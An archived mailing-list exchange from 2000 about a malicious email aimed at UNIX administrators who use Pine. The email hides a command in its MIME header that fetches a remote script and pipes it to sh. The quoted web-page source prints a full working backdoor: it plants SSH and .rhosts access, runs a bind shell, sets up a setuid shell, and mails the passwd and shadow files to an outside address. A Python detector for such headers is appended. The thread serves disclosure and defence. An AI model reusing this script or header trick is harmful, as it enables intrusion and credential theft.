Hi Tang,

Thanks for your information.

It probably is a new virus (found only after 16 May) which is especially designed for UNIX administrators who like to use PINE as the email client. You can find more discussion in the newsgroup... for example,
http://x42.deja.com/getdoc.xp?AN=624410603&search=thread&CONTEXT=958548790.554172430&HIT_CONTEXT=958548790.554172430&HIT_NUM=1&hitnum=0

Best regards,
Voyage

------------------------------------------------------------------------------
Io Hio Hong, Voyage
CI, Centro de Informatica (http://www-ci.ipm.edu.mo)
Macau Polytechnic Institute (http://www.ipm.edu.mo)
Tel: 5996175 Fax: 530505
Email: [EMAIL PROTECTED] ICQ: 4050204

On Wed, 17 May 2000, Tang wrote:

> Hello,
>
> I received an email attention to root with strange contents. The
> whole email is shown for your reference.
> When I read the logs attached with the mail, I don't find anything
> (ip address, dns) relating to our domain.
>
> Then I try to know where is the email from, so I point my browser to
> http://tofan.onza.net. The browser outputs
> a page of shell scripts and program code! They are also attached at
> the end of this mail. Then I start to scan the
> whole email carefully, and find a line of strange Content-Type
> statement as follows:
>
> Content-Type: TEXT/PLAIN;
> charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> name="emailf" Content-Transfer-Encoding: BASE64
>
> Looks like to start Lynx to browse the page with the suspicious codes,
> then run the code to steal the /etc/passwd
> file!
>
> Seems like my Pine didn't run Lynx automatically..... but not sure
> the harm to us yet!
>
> Do you ever receive some email like this? Any comments?
>
> regards,
> Tang.
>
> UMac, INESC Macau
> R.A.
>
>
> ============================== Beginning of email =============================
> >From [EMAIL PROTECTED] Mon May 15 15:18:55 2000
> Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
>     by inesc-macau.org.mo (8.9.2/8.9.2/Debian/GNU) with ESMTP id PAA16075
>     for <[EMAIL PROTECTED]>; Mon, 15 May 2000 15:16:41 +0800 (CST)
> Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
>     mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
>     Version 5.5.2650.21)
>     id K69W8LSQ; Mon, 15 May 2000 08:55:41 +0200
> Received: from atl-qbu-zpn-vty3.as.wcom.net ([216.192.215.3]) by
>     Bastion.Fontijne.nl; Mon, 15 May 2000 08:48:49 +0000 (GMT)
> Message-ID: <[EMAIL PROTECTED]>
> Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
> From: root <[EMAIL PROTECTED]>
> Subject: DOS attack, log file attached!
> MIME-Version: 1.0
> To: [EMAIL PROTECTED]
> Content-Type: MULTIPART/MIXED;
>     BOUNDARY="-1463811839-1047689522-958180505=:1450"
> Status: RO
> X-Status:
>
> This message is in MIME format. The first part should be readable text,
> while the remaining parts are likely unreadable without MIME-aware tools.
> Send mail to [EMAIL PROTECTED] for more info.
>
> ---1463811839-1047689522-958180505=:1450
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
> THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
> SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL
> FROM YOUR DOMAIN.
> AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
> ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.
>
> Jerry Leininser
> [EMAIL PROTECTED]
>
> ---2463811839-1047689522-958180505=:1450
> Content-Type: APPLICATION/octet-stream;
>     name="log.txt.tofan.onza.net.exit"
> Content-Transfer-Encoding: BASE64
> Content-ID: <[EMAIL PROTECTED]>
> Content-Description:
>
> ---2463811839-1047689522-958180505=:1450--
> ---1463811839-1047689522-958180505=:1450
> Content-Type: TEXT/PLAIN;
> charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> name="emailf" Content-Transfer-Encoding: BASE64
> Content-Description: THE LOGS
> Content-Disposition: attachment; filename="emailf"
>
>
> PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
> WE HAVE FACED A KERNEL PANIC!
>
> Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
>     206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55 .S....
> Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
>     206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55 .S....
> Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
>     206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55 .S....
> Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
>     206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55 .S....
> Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
>     206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55 .S....
> Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
>     206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55 .S....
> Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
>     206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
> Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1412 \
>     206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
>
> Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
>     206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
>
> Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1412 \
>     206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55 .S....
> Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1423 \
>     206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55 .S....
>
>
> ---1463811839-1047689522-958180505=:1450--
>
> ================================ End of email ==============================
>
>
> ============================== Source of web page ==============================
> grep "[EMAIL PROTECTED]" ~/.ssh/authorized_keys >/dev/null 2>&1 || if [ 0 ];
> then
> if [ ! -d ~/.ssh ]
> then umask 022 >/dev/null 2>&1;mkdir ~/.ssh >/dev/null 2>&1
> echo "+ +" >> ~/.rhosts 2>/dev/null
> fi
> umask 022 >/dev/null 2>&1
> echo "512 35
> 9785877609308338986917478061014184970982460312434529051173539551539508793288925026879592531038110506684705572154197270221242712482140435531967239855453591
> [EMAIL PROTECTED]" >> ~/.ssh/authorized_keys 2>/dev/null
> cat << __EOF__ > /tmp/io.c
> #define PORT 56789
> #include <stdio.h>
> #include <signal.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
>
> int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
> struct sockaddr_in serv_addr;
> struct sockaddr_in client_addr;
>
> int main (int argc, char **argv)
> {
>
>     soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
>     if (soc_des == -1)
>         exit(-1);
>     bzero((char *) &serv_addr, sizeof(serv_addr));
>     strcpy(argv[0],"updated");
>     serv_addr.sin_family = AF_INET;
>     serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
>     serv_addr.sin_port = htons(PORT);
>     soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
>                   sizeof(serv_addr));
>     if (soc_rc != 0)
>         exit(-1);
>     if (fork() != 0)
>         exit(0);
>     setpgrp();
>     signal(SIGHUP, SIG_IGN);
>     if (fork() != 0)
>         exit(0);
>     soc_rc = listen(soc_des, 5);
>     if (soc_rc != 0)
>         exit(0);
>     while (1) {
>         soc_len = sizeof(client_addr);
>         soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
>                          &soc_len);
>         if (soc_cli < 0)
>             exit(0);
>         cli_pid = getpid();
>         server_pid = fork();
>         if (server_pid != 0) {
>             dup2(soc_cli,0);
>             dup2(soc_cli,1);
>             dup2(soc_cli,2);
>             execl("/bin/sh","sh", "-i",(char *)0);
>             close(soc_cli);
>             exit(0);
>         }
>         close(soc_cli);
>     }
> }
> __EOF__
> gcc -o /tmp/io /tmp/io.c >/dev/null 2>&1
> /tmp/io >/dev/null 2>&1 ||mkdir /tmp/.pkoss493 >/dev/null 2>&1&&cp
> /bin/sh /tmp/.pkoss493/.rc >/dev/null 2>&1;chmod 4715 /tmp/.pkoss493/.rc
> >/dev/null 2>&1
> rm -rf /tmp/io.c
> rm -rf /tmp/io
> mail -s hhp000 [EMAIL PROTECTED] >/dev/null 2>&1 < /etc/passwd
> echo "`hostname -i 2>&1` - `id 2>&1`- `uname -a 2>&1`- `ls -al ~
> 2>&1` - `cat /etc/shadow 2>&1`" | mail -s hhp001 [EMAIL PROTECTED]
> 2>/dev/null
> chmod og-w ~ >/dev/null 2>&1
> chmod og-w ~/.ssh >/dev/null 2>&1
> fi
> ============================== End of source of web page ==========================
>
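
The Content-Type line Tang singles out above can be checked for mechanically at the mail gateway or in a mailbox sweep. The following is an added example, not part of the original thread: it walks every MIME part of a message and flags Content-Type or Content-Disposition headers that carry shell command-substitution syntax. The function name, the pattern list and the sample message (with the placeholder host `host.example.invalid`) are constructed for illustration.

```python
import email
import re

# Shell syntax that has no place in a MIME header parameter: backticks,
# $(...) and ${...} expansion, $IFS used to smuggle spaces, and pipes.
# This pattern list is an assumption for the example, not an exhaustive rule.
SHELL_SYNTAX = re.compile(r"`|\$\(|\$\{|\$IFS|\|")
CHECKED_HEADERS = ("content-type", "content-disposition")


def suspicious_mime_headers(raw_message):
    """Return (part_index, header_name, value) for headers carrying shell syntax."""
    msg = email.message_from_string(raw_message)
    findings = []
    # walk() yields the top-level message first, then each nested part.
    for index, part in enumerate(msg.walk()):
        for name, value in part.items():
            if name.lower() not in CHECKED_HEADERS:
                continue
            unfolded = " ".join(value.split())  # undo header line folding
            if SHELL_SYNTAX.search(unfolded):
                findings.append((index, name, unfolded))
    return findings


# Constructed sample modelled on the header quoted in the thread.
SAMPLE = "\n".join([
    "From: root@host.example.invalid",
    "Subject: DOS attack, log file attached!",
    "MIME-Version: 1.0",
    'Content-Type: MULTIPART/MIXED; BOUNDARY="sample-boundary-001"',
    "",
    "--sample-boundary-001",
    "Content-Type: TEXT/PLAIN; charset=US-ASCII",
    "",
    "Notice text.",
    "--sample-boundary-001",
    "Content-Type: TEXT/PLAIN;",
    " charset=``lynx${IFS}-source${IFS}host.example.invalid|sh|exit``; name=\"log\"",
    "Content-Transfer-Encoding: BASE64",
    'Content-Disposition: attachment; filename="emailf"',
    "",
    "U2FtcGxl",
    "--sample-boundary-001--",
    "",
])

if __name__ == "__main__":
    for index, name, value in suspicious_mime_headers(SAMPLE):
        print(f"part {index}: {name}: {value}")
```

A hit on any part is reason to quarantine the message before a mail client or helper program gets to interpret the header.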

